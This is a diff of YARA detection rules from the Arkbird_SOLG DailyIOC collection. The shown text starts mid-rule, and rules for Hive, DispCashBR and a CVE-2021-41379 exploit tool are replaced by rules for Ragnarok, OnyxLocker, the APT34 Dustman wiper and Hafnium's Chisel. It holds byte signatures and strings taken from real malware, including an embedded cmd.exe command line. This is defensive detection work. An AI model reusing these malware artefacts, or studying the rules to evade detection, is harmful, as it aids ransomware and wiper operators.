00 b8 60 00 00 00 48 6b c0 02 48 8b 4c 24 60 48 03 41 68 48 89 44 24 20 48 8b 44 24 20 c7 00 23 00 00 00 48 8b 44 24 20 c7 40 08 01 00 00 00 48 8b 44 24 20 c7 40 0c 01 00 00 00 48 8b 44 24 20 c7 40 10 01 00 00 00 48 8b 44 24 20 c7 40 14 01 00 00 00 48 8b 44 24 20 c7 40 18 01 } - $s2 = { 48 8b 44 24 50 48 8b 00 c7 40 28 10 00 00 00 48 8b 44 24 50 48 8b 00 b9 04 00 00 00 48 6b c9 00 48 8b 54 24 50 8b 92 18 01 00 00 89 54 08 2c 48 8b 44 24 50 48 8b 00 48 8b 4c 24 50 ff 10 48 8b 4c 24 50 e8 80 f8 ff ff 48 8b 4c 24 50 e8 c6 fe ff ff 48 8b 44 24 50 83 78 78 00 76 16 48 8b 44 24 50 83 78 74 00 76 0b 48 8b 44 24 50 83 78 7c 00 7f 1e 48 8b 44 24 50 48 8b 00 c7 40 28 21 00 00 00 48 8b 44 24 50 48 8b 00 48 8b 4c 24 50 ff 10 48 8b 44 24 50 48 8b 4c 24 50 8b 40 74 0f af 41 7c 89 44 24 24 8b 44 24 24 89 44 24 34 8b 44 24 24 39 44 24 34 74 1e 48 8b 44 24 50 48 8b 00 c7 40 28 48 00 00 00 48 8b 44 24 50 48 8b 00 48 8b 4c 24 50 ff 10 48 8b 44 24 38 c7 40 18 00 00 00 00 48 8b 4c 24 50 e8 0c fc ff ff 48 8b 4c 24 38 88 41 1c 48 8b 44 24 38 48 c7 40 20 00 00 00 00 48 8b 44 24 38 48 c7 40 28 00 00 00 00 48 8b 44 24 50 0f b6 40 62 85 c0 74 0d 48 8b 44 } - $s3 = { 48 8b 84 24 c0 00 00 00 8b 80 64 01 00 00 39 44 24 30 0f 8d 82 00 00 00 48 63 44 24 30 48 8b 8c 24 c0 00 00 00 48 8b 84 c1 68 01 00 00 48 89 44 24 58 48 8b 44 24 38 48 8b 4c 24 58 8b 40 10 0f af 41 0c 48 8b 4c 24 58 48 63 49 04 48 8b 94 24 c0 00 00 00 48 8b 52 08 48 89 54 24 70 c6 44 24 20 00 4c 8b 44 24 58 45 8b 48 0c 44 8b c0 48 8b 44 24 38 48 8b 54 c8 70 48 8b 8c 24 c0 00 00 00 48 8b 44 24 70 ff 50 40 48 63 4c 24 30 48 89 84 cc 80 00 00 00 e9 5c ff ff ff 48 8b 44 24 38 8b 40 18 89 44 24 40 eb 0a 8b 44 24 40 ff c0 89 44 24 40 48 8b 44 24 38 8b 40 1c 39 44 24 40 0f 8d af 01 00 00 48 8b 44 24 38 8b 40 14 89 44 24 44 eb 0a 8b 44 24 44 ff c0 89 44 24 44 48 8b 84 24 c0 00 00 00 8b 80 88 01 00 00 39 44 24 44 0f 83 6e 01 00 00 c7 44 24 50 00 00 00 00 c7 44 24 30 00 00 00 00 eb 0a 8b 44 24 30 ff c0 89 44 24 30 48 8b 84 24 c0 00 00 00 8b 80 64 01 00 00 39 44 24 30 0f 8d e2 00 00 00 48 63 44 24 30 48 8b 8c 24 c0 00 00 00 48 8b 84 c1 68 01 00 00 48 89 44 24 58 48 8b 44 24 58 8b 4c 24 44 0f af 48 38 8b c1 89 44 24 60 c7 44 24 48 00 00 00 00 eb 0a 8b 44 24 48 ff c0 89 44 24 48 48 8b } + $f1 = "bootfont.bin" fullword wide + $f2 = "bootmgr.efi" fullword wide + $f3 = "bootsect.bak" fullword wide + $r1 = "$!.txt" fullword wide + $r2 = "---BEGIN KEY R_R---" fullword ascii + $r3 = "!$R4GN4R_" fullword wide + $r4 = "RAGNRPW" fullword ascii + $r5 = "---END KEY R_R---" fullword ascii + $a1 = "+RhRR!-uD8'O&Wjq1_P#Rw<9Oy?n^qSP6N{BngxNK!:TG*}\\|W]o?/]H*8z;26X0" fullword ascii + $a2 = "\\\\.\\PHYSICALDRIVE%d" fullword wide + $a3 = "WinSta0\\Default" fullword wide + $a4 = "%s-%s-%s-%s-%s" fullword wide + $a5 = "SOFTWARE\\Microsoft\\Cryptography" fullword wide + $c1 = "-backup" fullword wide + $c2 = "-force" fullword wide + $c3 = "-vmback" fullword wide + $c4 = "-list" fullword wide + $s1 = ".ragn@r_" fullword wide + $s2 = "\\notepad.exe" fullword wide + $s3 = "Opera Software" fullword wide + $s4 = "Tor browser" fullword wide condition: - uint16(0)==0x5A4D and filesize >200KB and all of ($s*) + uint16(0)==0x5a4d and filesize <30KB and (pe.imphash()=="2c2aab89a4cba444cf2729e2ed61ed4f" and ((2 of ($f*)) and (3 of ($r*)) and (4 of ($a*)) and (2 of ($c*)) and (2 of ($s*)))) } -rule ARKBIRD_SOLG_RAN_ELF_Hive_Oct_2021_1 : FILE +rule ARKBIRD_SOLG_Ran_Onyxlocker_Nov_2020_1 : FILE { meta: - description = "Detect ELF version of Hive ransomware" + description = "Detect OnyxLocker ransomware" author = "Arkbird_SOLG" - id = "434cfe85-3209-5990-9c68-47ce4fafd5b8" - date = "2021-10-29" - modified = "2021-10-30" - reference = "https://twitter.com/ESETresearch/status/1454100591261667329" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-29/Hive/RAN_ELF_Hive_Oct_2021_1.yara#L1-L19" + id = "bb7d914c-a074-5d79-a5d2-43c5a0adf49e" + date = "2020-11-18" + modified = "2020-11-18" + reference = "https://twitter.com/Kangxiaopao/status/1328614320016560128" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-18/OnyxLocker/Ran_OnyxLocker_Nov_2020_1.yar#L1-L27" license_url = "N/A" - logic_hash = "47ccf3b825521986070dba92194d5937289c0335b922537ea3242c4afb2be237" - score = 60 - quality = 35 + logic_hash = "1ccca1040acee5bb937fd5ebb3536f8c644d3586229d01457d780bef5fcb57a1" + score = 75 + quality = 71 tags = "FILE" - hash1 = "6a0449a0b92dc1b17da219492487de824e86a25284f21e6e3af056fe3f4c4ec0" - hash2 = "bdf3d5f4f1b7c90dfc526340e917da9e188f04238e772049b2a97b4f88f711e3" - tlp = "white" - adversary = "-" - level = "experimental" + hash1 = "7e3c97d3d274b5f7fedad6e392e6576ac3e5724ddd7e48c58a654b6b95eb40d7" strings: - $s1 = { 49 3b 66 10 76 ?? 48 83 ec ?? 48 89 6c 24 ?? 48 8d 6c 24 ?? 48 8b [3] 48 } - $s2 = { 48 89 f8 48 89 f3 48 83 ec 27 48 83 e4 f0 48 89 44 24 10 48 89 5c 24 18 48 8d 3d 41 [2] 00 48 8d 9c 24 68 00 ff ff 48 89 5f 10 48 89 5f 18 48 89 1f 48 89 67 08 b8 00 00 00 00 0f a2 89 c6 83 f8 00 74 33 81 fb 47 65 6e 75 75 1e 81 fa 69 6e 65 49 75 16 81 f9 6e 74 65 6c 75 0e c6 05 [3] 00 01 c6 05 [3] 00 01 b8 01 00 00 00 0f a2 89 05 [3] 00 48 8b 05 } - $s3 = { 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc } - $s4 = { 00 00 48 8b ac 24 68 02 00 00 48 81 c4 70 02 00 00 c3 ?? 80 ?? 0e [6] 48 8b [2] 48 } + $s1 = "IEncryptionProvider" fullword ascii + $s2 = "OnyxLocker.exe" fullword wide + $s3 = "GetEncryptionThreads" fullword ascii + $s4 = "CreateEncryptionKey" fullword ascii + $s5 = ".NETFramework,Version=v4.5.2" fullword ascii + $s6 = "get_TargetFiles" fullword ascii + $s7 = "IsTargetFile" fullword ascii + $s8 = "<TargetFiles>k__BackingField" fullword ascii + $s9 = "XxteaEncryptionProvider" fullword ascii + $s10 = "GetStartingFolders" fullword ascii + $s11 = "<EncryptionKey>k__BackingField" fullword ascii + $s12 = "RECOVERY INSTRUCTIONS" fullword wide + $s13 = "$182eaa96-fcb2-458b-85cb-a9b8da57ae71" fullword ascii + $s14 = ".NET Framework 4.5.2" fullword ascii + $s15 = "TraverseDirectories" fullword ascii + $s16 = "{0} {1}" fullword wide condition: - uint32(0)==0x464C457F and filesize >20KB and all of ($s*) + uint16(0)==0x5a4d and filesize >8KB and 8 of them } -rule ARKBIRD_SOLG_ATM_Dispcashbr_May_2021_1 : FILE +rule ARKBIRD_SOLG_APT_APT34_Dustman_Apr_2021_1 : FILE { meta: - description = "Detect the DispCashBR ATM malware" + description = "Detect the Installer of Dustman wiper used by APT34" author = "Arkbird_SOLG" - id = "629261d8-242c-580d-aa4d-4b313c77edef" - date = "2020-05-14" - modified = "2021-05-14" + id = "071063f5-d2a4-5666-a8c4-283c02061f6d" + date = "2021-04-28" + modified = "2021-04-30" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-14/DispCashBR/ATM_DispCashBR_May_2021_1.yara#L1-L18" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-29/APT34/APT_APT34_Dustman_Apr_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "26f641a266c1f187d834a05b327c13ddee93747e182a5458e4ec3cb1f23f5f47" + logic_hash = "44e68fa21c1d6258bc9c0dcdc9cc531a15081122c90b23607bcfda716471aeb6" score = 75 quality = 75 tags = "FILE" - hash1 = "432f732a4ecbb86cb3dedbfa881f2733d20cbcc5958ead52823bf0967c133175" - hash2 = "7cea6510434f2c8f28c9dbada7973449bb1f844cfe589cdc103c9946c2673036" - tlp = "White" - adversary = "-" + hash1 = "a9397eb9e95087db7e03239c689776d56c1450d685568564acd90e1532c78882" + tlp = "white" + adversary = "APT34" strings: - $seq1 = { c7 45 cc 00 00 00 00 c7 04 24 68 5d 40 00 e8 40 0e 00 00 8b 85 a0 fd ff ff 8b 40 0a 8b 40 03 89 44 24 04 c7 04 24 89 5d 40 00 e8 0c 0e 00 00 c7 04 24 a4 5d 40 00 e8 18 0e 00 00 8b 85 a0 fd ff ff 8b 40 0a 8b 40 03 01 45 cc c7 04 24 d0 07 00 00 e8 7d 0e 00 00 83 ec 04 8b 85 a0 fd ff ff 8d 48 0a 0f b7 85 be fd ff ff 0f b7 c0 8d 95 98 fd ff ff 89 54 24 10 c7 44 24 0c 00 00 00 00 89 4c 24 08 c7 44 24 04 2e 01 00 00 89 04 24 e8 75 05 00 00 83 ec 14 89 45 e8 8b 45 e8 83 c0 38 83 } - $seq2 = { 0f b7 85 be fd ff ff 0f b7 c0 8b 55 e4 89 54 24 08 c7 44 24 04 06 00 00 00 89 04 24 e8 7e 17 00 00 83 ec 0c 0f b7 85 be fd ff ff 0f b7 c0 8d 95 b8 fd ff ff 89 54 24 08 c7 44 24 04 00 00 00 00 89 04 24 e8 5f 17 00 00 83 ec 0c 0f b7 85 be fd ff ff 0f b7 c0 8d 95 26 fd ff ff 89 54 24 10 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 2e 01 00 00 89 04 24 e8 f8 16 00 00 83 ec 14 89 45 e0 8d 85 ac fd ff ff 89 44 24 08 c7 44 24 04 03 00 00 00 c7 04 24 04 00 00 00 e8 dc 16 00 00 83 ec 0c 8b 45 e0 83 c0 38 83 f8 } - $seq3 = { 8b 85 a8 fd ff ff 8b 50 14 8b 85 a8 fd ff ff 8b 40 10 0f af c2 89 45 d8 8b 45 d8 89 44 24 04 c7 04 24 04 5b 40 00 e8 aa 12 00 00 8b 85 a4 fd ff ff 0f b7 40 04 0f b7 c0 89 44 24 04 c7 04 24 24 5b 40 00 e8 8d 12 00 00 8b 85 a8 fd ff ff 8b 50 18 8b 85 a8 fd ff ff 8b 40 1c 0f af c2 89 45 d4 c7 45 f0 00 00 00 00 8b 45 d8 89 44 24 04 c7 04 24 45 5b 40 00 e8 5b 12 00 00 83 45 f0 01 83 7d f0 01 7e e3 8b 85 a0 fd ff ff c7 40 06 01 00 00 00 0f b7 85 be fd ff ff 0f b7 c0 8d 95 26 fd ff ff 89 54 24 10 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 2e 01 00 00 89 04 24 e8 60 ed ff ff 89 45 d0 } - $seq4 = { c7 45 ec 00 00 00 00 8d 85 c4 fd ff ff 89 44 24 04 c7 04 24 03 00 02 0b e8 47 1b 00 00 83 ec 08 89 45 e8 83 7d e8 00 74 18 c7 04 24 92 50 40 00 e8 8b 23 00 00 c7 04 24 ff ff ff ff e8 8f 23 00 00 c7 04 24 aa 50 40 00 e8 8b 23 00 00 c7 04 24 f5 ff ff ff e8 ef 23 00 00 83 ec 04 c7 44 24 04 03 00 00 00 89 04 24 e8 e4 23 00 00 83 ec 08 c7 04 24 b8 0b 00 00 e8 dd 23 00 00 83 ec 04 c7 04 24 c4 50 40 00 e8 4e 23 00 00 8d 85 c4 fd ff ff 83 c0 06 89 44 24 04 c7 04 24 ed 50 40 00 e8 1d 23 00 00 8d 85 c4 fd ff ff 05 07 01 00 00 89 44 24 04 c7 04 24 03 51 40 00 e8 02 23 00 00 0f b7 85 c8 fd ff ff 0f b7 c0 89 44 24 04 c7 04 24 1a 51 40 00 e8 e8 22 00 00 0f b7 85 c6 fd ff ff 0f b7 c0 89 44 24 04 c7 04 24 2f 51 40 00 e8 ce 22 00 00 0f b7 85 c4 fd ff ff 0f b7 c0 89 44 24 04 c7 04 24 42 51 40 00 e8 b4 22 00 00 c7 04 24 54 51 40 00 e8 c0 22 00 00 8d 85 c0 fd ff ff 89 04 24 e8 46 1a 00 00 83 ec 04 8b 85 c0 fd ff ff 8d 95 be fd ff ff 89 54 24 20 c7 44 24 1c 00 00 00 00 8d 95 c4 fd ff ff 89 54 24 18 c7 44 24 14 0f 00 02 0b c7 44 24 10 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 89 44 24 04 c7 04 24 7f 51 40 00 e8 f9 19 00 00 83 ec 24 89 45 e8 8b 45 e8 83 c0 36 83 f8 } + $s1 = { 43 3a 5c 77 69 6e 64 6f 77 73 5c 73 79 73 74 65 6d 33 32 5c 63 6d 64 2e 65 78 65 00 00 00 00 00 2f 63 20 61 67 65 6e 74 2e 65 78 65 20 41 00 00 44 00 6f 00 77 00 6e 00 20 00 57 00 69 00 74 00 68 00 20 00 42 00 69 00 6e 00 20 00 53 00 61 00 6c 00 6d 00 61 00 6e 00 00 00 00 00 5c 00 } + $s2 = "\\assistant.sys" fullword wide + $s3 = { 61 00 67 00 65 00 6e 00 74 00 2e 00 65 00 78 00 65 00 00 00 00 00 00 00 53 00 6f 00 66 00 74 00 77 00 61 00 72 00 65 00 5c 00 4f 00 72 00 61 00 63 00 6c 00 65 00 5c 00 56 00 69 00 72 00 74 00 75 00 61 00 6c 00 42 00 6f 00 78 00 00 00 00 00 54 68 65 20 4d 61 67 69 63 20 57 6f 72 64 21 00 56 00 42 00 6f 00 78 00 44 00 72 00 76 00 00 00 5c 00 44 00 65 00 76 00 69 00 63 00 65 00 00 00 56 00 42 00 6f 00 78 00 55 00 53 00 42 00 4d 00 6f 00 6e 00 00 00 00 00 56 00 42 00 6f 00 78 00 4e 00 65 00 74 00 41 00 64 00 70 00 00 00 00 00 56 00 42 00 6f 00 78 00 4e 00 65 00 74 00 4c 00 77 00 66 } + $s4 = { 5c 00 5c 00 2e 00 5c 00 25 00 73 } + $s5 = { 68 54 00 00 00 68 00 00 00 00 68 80 69 40 00 e8 f4 0f 00 00 83 c4 0c 68 00 00 00 00 e8 ed 0f 00 00 a3 84 69 40 00 68 00 00 00 00 68 00 10 00 00 68 00 00 00 00 e8 da 0f 00 00 a3 80 69 40 00 e8 fc 2f 00 00 e8 7d 2c 00 00 e8 7a 18 00 00 e8 1d 12 00 00 e8 40 2d 00 00 68 00 00 00 00 e8 78 2f 00 00 a3 8c 69 40 00 68 00 00 00 00 e8 8d 2f 00 00 a3 90 69 40 00 c7 05 94 69 40 00 5a 00 00 00 c7 05 98 69 40 00 14 00 00 00 8b 1d 8c 69 40 00 2b 1d 94 69 40 00 83 c3 ea 89 1d 9c 69 40 00 8b 1d 90 69 40 00 2b 1d 98 69 40 00 83 c3 cc 89 1d a0 69 40 00 68 00 00 c8 00 68 18 60 40 00 ff 35 98 69 40 00 ff 35 94 69 40 00 ff 35 a0 69 40 00 ff 35 9c 69 40 00 68 00 00 00 } + $s6 = "Release\\Dustman.pdb" fullword ascii condition: - uint16(0)==0x5a4d and filesize >20KB and 3 of ($seq*) + uint16(0)==0x5a4d and filesize >50KB and 4 of them } -rule ARKBIRD_SOLG_EXP_CVE_2021_41379_Nov_2021_1 : CVE_2021_41379 FILE +rule ARKBIRD_SOLG_APT_Chisel_Hafnium_Feb_2021_1 : FILE { meta: - description = "Detect exploit tool using CVE-2021-41379" + description = "Rule for detecting Chisel kit tool used by Hafnium" author = "Arkbird_SOLG" - id = "616e697d-0c62-58bb-9f37-29670a09d886" - date = "2021-11-26" - modified = "2021-11-29" - reference = "https://twitter.com/JAMESWT_MHT/status/1463414554004709384" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-26/EXP_CVE_2021_41379_Nov_2021_1.yara#L1-L21" + id = "cd6be3b4-71fd-5e17-8835-a331a24fc5d6" + date = "2021-02-23" + modified = "2021-04-25" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-23/Hafinum/APT_Chisel_Hafnium_Feb_2021_1.yara#L1-L28" license_url = "N/A" - logic_hash = "5514ab8f95a5d82453407dd506d55eaf1a0aa22f5ce6a5fb18501ef41645305a" + hash = "4afa5fde76f1f3030cf7dbd12e37b717e1f902ac95c8bdf54a2e58a64faade04" + logic_hash = "8e56234ce59197a8df51b21b89d3a901785dbb0211ab576cb3d194de34b611de" score = 75 - quality = 75 - tags = "CVE-2021-41379, FILE" - hash1 = "5d97d3035b2ec1bd16016922899350693cae5f7a3be6cadbe0da34fbfd14b612" - hash2 = "76fe99189fa84e28dd346b1105da77c4dfd3f7f16478b05bfca4c13a75d9fd07" - hash3 = "9e4763ddb6ac4377217c382cf6e61221efca0b0254074a3746ee03d3d421dabd" - hash4 = "a018545b334dc2a0e0c437789a339c608852fa1cedcc88be9713806b0855faea" + quality = 57 + tags = "FILE" + adversary = "Hafnium" tlp = "white" - adversary = "-" strings: - $s1 = { 50 6a 01 50 68 03 00 08 00 68 [3] 00 ff 15 [3] 00 8b f0 83 fe ff 0f 84 [2] 00 00 6a 00 56 ff 15 88 [2] 00 8d 85 ?? fb ff ff c7 85 ?? fb ff ff 00 00 00 00 50 56 ff 15 [3] 00 8b 3d [3] 00 56 ff d7 ff 15 [3] 00 50 6a 00 68 00 10 10 00 ff 15 [3] 00 8b f0 c7 85 ?? fb ff ff 00 00 00 00 8d 85 ?? fb ff ff 50 68 ff 01 0f 00 56 ff 15 [3] 00 56 ff d7 8d 85 ?? fb ff ff c7 85 ?? fb ff ff 00 00 00 00 50 6a 01 6a 02 6a 00 68 ff 01 0f 00 ff b5 ?? fb ff ff ff 15 [3] 00 ff b5 ?? fb ff ff ff d7 6a 04 8d 85 ?? fb ff ff 50 6a 0c ff b5 ?? fb ff ff ff 15 08 [2] 00 6a 44 8d 85 78 fb ff ff 0f 57 c0 6a 00 50 0f 11 85 bc fb ff ff e8 [2] 00 00 83 c4 0c c7 85 78 fb ff ff 44 00 00 00 b8 05 00 00 00 c7 85 80 fb ff ff [3] 00 66 89 85 a8 fb ff ff 8d 85 e8 fd ff ff 68 04 01 00 00 50 68 [3] 00 ff 15 [3] 00 8d 85 bc fb ff ff 50 8d 85 78 fb ff ff 50 6a 00 6a 00 6a 10 6a 00 6a 00 6a 00 6a 00 8d 85 e8 fd ff ff 50 ff b5 ?? fb ff ff ff 15 [3] 00 ff b5 ?? fb ff ff ff d7 ff b5 bc fb ff ff ff d7 ff b5 c0 fb ff ff ff d7 } - $s2 = { 6a 00 68 80 00 00 04 6a 04 6a 00 6a 01 68 00 00 01 80 8d 85 e8 fd ff ff 50 ff 15 [3] 00 8b 35 [3] 00 a3 [3] 00 8d 85 d8 fb ff ff 50 6a 00 6a 00 68 [2] 40 00 6a 00 6a 00 c7 85 d8 fb ff ff 00 00 00 00 ff d6 8b f8 8b 85 dc fb ff ff 68 [3] 00 05 0c 02 00 00 68 04 01 00 00 50 } - $s3 = { 55 8b ec 81 ec 04 08 00 00 a1 04 [2] 00 33 c5 89 45 fc 0f 10 05 [3] 00 ?? 8b ?? 08 8d 85 2c f8 ff ff [0-1] 0f 11 85 fc f7 ff ff [1-5] 0f 10 05 [3] 00 [3-8] 0f 11 85 0c f8 ff ff [0-1] 0f 10 05 } - $s4 = { 50 ff ?? 68 04 01 00 00 8d 85 e0 fb ff ff 50 6a 00 ff 15 [3] 00 50 ff 15 [3] 00 6a 00 e8 [2] ff ff 50 8d 85 e0 fb ff ff 50 ff 15 84 [2] 00 6a 00 ff 15 [3] 00 8d 85 ?? fb ff ff 50 68 [3] 00 6a 04 6a 00 68 [3] 00 ff 15 [3] 00 ff 15 [3] 00 8b 35 [3] 00 8b 3d [3] 00 } + $str1 = { 48 61 6e 64 73 68 61 6b 69 6e 67 20 77 69 74 68 20 25 73 2e 2e 2e } + $str2 = { 4c 65 74 73 45 6e 63 72 79 70 74 20 63 61 63 68 65 20 64 69 72 65 63 74 6f 72 79 20 25 73 } + $str3 = { 65 6e 63 6f 64 65 20 65 72 72 6f 72 3a 20 25 77 } + $str4 = { 28 65 72 72 6f 72 20 25 73 29 } + $str5 = { 45 72 72 6f 72 20 6c 6f 61 64 69 6e 67 20 63 6c 69 65 6e 74 20 63 65 72 74 20 61 6e 64 20 6b 65 79 20 70 61 69 72 3a 20 25 76 } + $str6 = { 4c 69 73 74 65 6e 69 6e 67 20 6f 6e 20 25 73 3a 2f 2f 25 73 3a 25 73 25 73 } + $str7 = { 46 61 69 6c 65 64 20 74 6f 20 64 65 63 6f 64 65 20 50 45 4d 3a 20 25 73} + $str8 = { 43 6c 6f 73 65 64 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 28 25 73 29 } + $str9 = { 70 72 6f 78 79 23 25 73 } + $seq1 = { 48 89 05 5a 96 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 3c 67 10 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 05 fd ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d d7 b4 40 00 48 89 15 d8 b4 40 00 83 3d 41 0d 45 00 00 90 0f 85 b5 0b 00 00 48 89 05 b3 b4 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 50 eb 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 96 fc ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d e8 b2 40 00 48 89 15 e9 b2 40 00 83 3d d2 0c 45 00 00 0f 85 36 0b 00 00 48 89 05 c5 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 e3 ea 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 28 fc ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d da b2 40 00 48 89 15 db b2 40 00 83 3d 64 0c 45 00 00 0f 1f 40 00 0f 85 b0 0a 00 00 48 89 05 b3 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 ee 65 10 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 b6 fb ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d e8 b2 40 00 48 89 15 e9 b2 40 00 83 3d f2 0b 45 00 00 0f 85 31 0a 00 00 48 89 05 c5 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 04 ea 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 48 fb ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a b3 40 00 48 89 15 5b b3 40 00 83 3d 84 0b 45 00 00 0f 1f 40 00 0f 85 aa 09 00 00 48 89 05 33 b3 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 0f 65 10 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 d6 fa ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 b0 40 00 48 89 15 c9 b0 40 00 83 3d 12 0b 45 00 00 0f 85 2b 09 00 00 48 89 05 a5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 25 e9 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 68 fa ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a b2 40 00 48 89 15 5b b2 40 00 83 3d a4 0a 45 00 00 0f 1f 40 00 0f 85 a8 08 00 00 48 89 05 33 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 b4 e8 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 f6 f9 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 08 b1 40 00 48 89 15 09 b1 40 00 83 3d 32 0a 45 00 00 0f 85 29 08 00 00 48 89 05 e5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 21 64 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 88 f9 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a af 40 00 48 89 15 5b af 40 00 83 3d c4 09 45 00 00 0f 1f 40 00 0f 85 a6 07 00 00 48 89 05 33 af 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 b1 63 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 16 f9 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 b0 40 00 48 89 15 c9 b0 40 00 83 3d 52 09 45 00 00 0f 85 27 07 00 00 48 89 05 a5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 45 63 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 a8 f8 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 9a af 40 00 48 89 15 9b af 40 00 83 3d e4 08 45 00 00 0f 1f 40 00 0f 85 a4 06 00 00 48 89 05 73 af 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 d5 62 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 36 f8 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 b0 40 00 48 89 15 c9 b0 40 00 83 3d 72 08 45 00 00 0f 85 22 06 00 00 48 89 05 a5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 69 62 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 c8 f7 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d fa ad 40 00 48 89 15 fb ad 40 00 83 3d 04 08 45 00 00 0f 1f 40 00 0f 85 9f 05 00 00 48 89 05 d3 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 f9 61 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 56 f7 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 ae 40 00 48 89 15 c9 ae 40 00 83 3d 92 07 45 00 00 0f 85 1c 05 00 00 48 89 05 a5 ae 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 8d 61 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 e8 f6 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 7a ad 40 00 48 89 15 7b ad 40 00 83 3d 24 07 45 00 00 0f 1f 40 00 0f 85 99 04 00 00 48 89 05 53 ad 40 00 0f 57 c0 0f 11 44 24 30 